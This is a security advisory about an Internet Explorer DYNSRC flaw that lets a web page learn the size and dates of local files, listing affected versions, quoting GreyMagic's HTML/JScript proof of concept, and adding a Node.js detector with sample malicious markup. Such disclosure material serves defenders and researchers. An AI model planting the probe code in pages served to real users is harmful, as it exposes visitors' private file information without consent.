
Microsoft Internet Explorer DYNSRC File Information Disclosure Issue


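Published: 2002-03-30
Updated: 2002-03-30
Severity:
Threat level: Disclosure of sensitive user information
Error type: Access validation error
Exploitation method: Server mode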

BUGTRAQ ID:4371

Affected systems
Microsoft Internet Explorer 5.01
   + Microsoft Windows 2000 Advanced Server 0.0
   + Microsoft Windows 2000 Datacenter Server 0.0
   + Microsoft Windows 2000 Professional 0.0
   + Microsoft Windows 2000 Server 0.0
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   - Microsoft Windows 98SE 0.0
   - Microsoft Windows NT Enterprise Server 4.0SP3
   - Microsoft Windows NT Enterprise Server 4.0SP4
   - Microsoft Windows NT Enterprise Server 4.0SP5
   - Microsoft Windows NT Enterprise Server 4.0SP6
   - Microsoft Windows NT Enterprise Server 4.0SP6a
   - Microsoft Windows NT Server 4.0SP3
   - Microsoft Windows NT Server 4.0SP4
   - Microsoft Windows NT Server 4.0SP5
   - Microsoft Windows NT Server 4.0SP6
   - Microsoft Windows NT Server 4.0SP6a
   - Microsoft Windows NT Terminal Server 4.0SP3
   - Microsoft Windows NT Terminal Server 4.0SP4
   - Microsoft Windows NT Terminal Server 4.0SP5
   - Microsoft Windows NT Terminal Server 4.0SP6
   - Microsoft Windows NT Terminal Server 4.0SP6a
   - Microsoft Windows NT Workstation 4.0SP3
   - Microsoft Windows NT Workstation 4.0SP4
   - Microsoft Windows NT Workstation 4.0SP5
   - Microsoft Windows NT Workstation 4.0SP6
   - Microsoft Windows NT Workstation 4.0SP6a
Microsoft Internet Explorer 5.0
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   + Microsoft Windows 98SE 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.0.1SP2
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.0.1SP1
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.5SP2
   - Microsoft Windows 2000 Terminal Services 0.0
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   - Microsoft Windows 98SE 0.0
   - Microsoft Windows ME 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows NT Enterprise Server 4.0
   - Microsoft Windows NT Terminal Server 4.0
Microsoft Internet Explorer 5.5SP1
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.5
   - Microsoft Windows 2000 Advanced Server 0.0
   - Microsoft Windows 2000 Advanced Server 0.0SP1
   - Microsoft Windows 2000 Advanced Server 0.0SP2
   - Microsoft Windows 2000 Datacenter Server 0.0
   - Microsoft Windows 2000 Datacenter Server 0.0SP1
   - Microsoft Windows 2000 Datacenter Server 0.0SP2
   - Microsoft Windows 2000 Professional 0.0
   - Microsoft Windows 2000 Professional 0.0SP1
   - Microsoft Windows 2000 Professional 0.0SP2
   - Microsoft Windows 2000 Server 0.0
   - Microsoft Windows 2000 Server 0.0SP1
   - Microsoft Windows 2000 Server 0.0SP2
   - Microsoft Windows 2000 Terminal Services 0.0
   - Microsoft Windows 2000 Terminal Services 0.0SP1
   - Microsoft Windows 2000 Terminal Services 0.0SP2
   - Microsoft Windows 95 0.0
   - Microsoft Windows 98 0.0
   + Microsoft Windows ME 0.0
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 6.0
   - Microsoft Windows 2000 Workstation 0.0
   - Microsoft Windows 2000 Workstation 0.0SP1
   - Microsoft Windows 2000 Workstation 0.0SP2
   - Microsoft Windows 98 0.0
   - Microsoft Windows 98SE 0.0
   - Microsoft Windows ME 0.0
   - Microsoft Windows NT 4.0SP6a
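Detailed description
Microsoft Internet Explorer has a security vulnerability that allows a remote attacker to obtain information about known files on the target system.

The problem lies in the implementation of the DYNSRC attribute. If it is exploited successfully, IE returns data through the image <img> element, including the file's creation date, file size, last-modified date and similar information.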

Test code
<img dynsrc="file://c:/test.txt" id="oFile">
<script language="jscript" defer>
setTimeout(
        function () {
                alert(
                        oFile.fileSize>-1 ?
                                "File exists!\n\n"+
                                "Size: "+oFile.fileSize+" bytes.\n"+
                                "Created: "+oFile.fileCreatedDate+".\n"+
                                "Modified: "+oFile.fileModifiedDate+".\n"+
                                "Updated: "+oFile.fileUpdatedDate+"."
                        :
                                "File does not exist."
                );
        },
        250
);
</script>

GreyMagic Software <security@greymagic.com> provides a live demonstration site:

http://security.greymagic.com/adv/gm003-ie/.

Solution
None available yet
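
With no fix listed, a filtering proxy or mail gateway can at least flag markup whose DYNSRC attribute points at a local file, which is the precondition for the disclosure described above. The following is an added example, not part of the original advisory or GreyMagic's code; the names findLocalDynsrc, classify and decodeRefs and the sample markup are constructed for illustration (runs under Node.js).

```javascript
// Added example: flag markup whose DYNSRC attribute refers to a local file.
// findLocalDynsrc, classify and SAMPLE are constructed for illustration.

// Decode numeric character references that could hide "file:" in a value.
const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '');
function decodeRefs(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&amp;/gi, '&');
}

// Return why a DYNSRC value is local, or null if it is not.
function classify(raw) {
  // Browsers ignore embedded tabs/newlines in URLs, so drop them first.
  const v = decodeRefs(raw).replace(/[\u0000-\u0020]/g, '').toLowerCase();
  if (v.startsWith('file:')) return 'file-scheme';
  if (/^[a-z]:[\\/]/.test(v)) return 'drive-path';
  if (v.startsWith('\\\\')) return 'unc-path';
  return null;
}

// Scan HTML text; quoted attribute values may legally contain '>'.
function findLocalDynsrc(html) {
  const tagRe = /<([a-z][a-z0-9]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>/gi;
  const attrRe = /([^\s"'=<>\/]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  const hits = [];
  for (const tag of html.matchAll(tagRe)) {
    for (const a of tag[2].matchAll(attrRe)) {
      if (a[1].toLowerCase() !== 'dynsrc') continue;
      const value = a[2] ?? a[3] ?? a[4];
      const reason = classify(value);
      if (reason) hits.push({ tag: tag[1].toLowerCase(), value, reason });
    }
  }
  return hits;
}

// Constructed sample input; the first line is the pattern from the advisory.
const SAMPLE = [
  '<img dynsrc="file://c:/test.txt" id="oFile">',
  "<IMG DynSrc='C:\\test.txt'>",
  '<img dynsrc=&#102;ile:///c:/test.txt>',
  '<img dynsrc="clip.avi" alt="a > b">', // ordinary relative media file
  '<img src="file://c:/test.txt">', // not DYNSRC, outside this check
].join('\n');

console.log(findLocalDynsrc(SAMPLE));
```

The scanner is regex-based and only as tolerant as the patterns shown; a production filter would run the same classification over the output of a real HTML parser.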

Related information
GreyMagic Software <security@greymagic.com>
Reference: http://online.securityfocus.com/archive/1/264343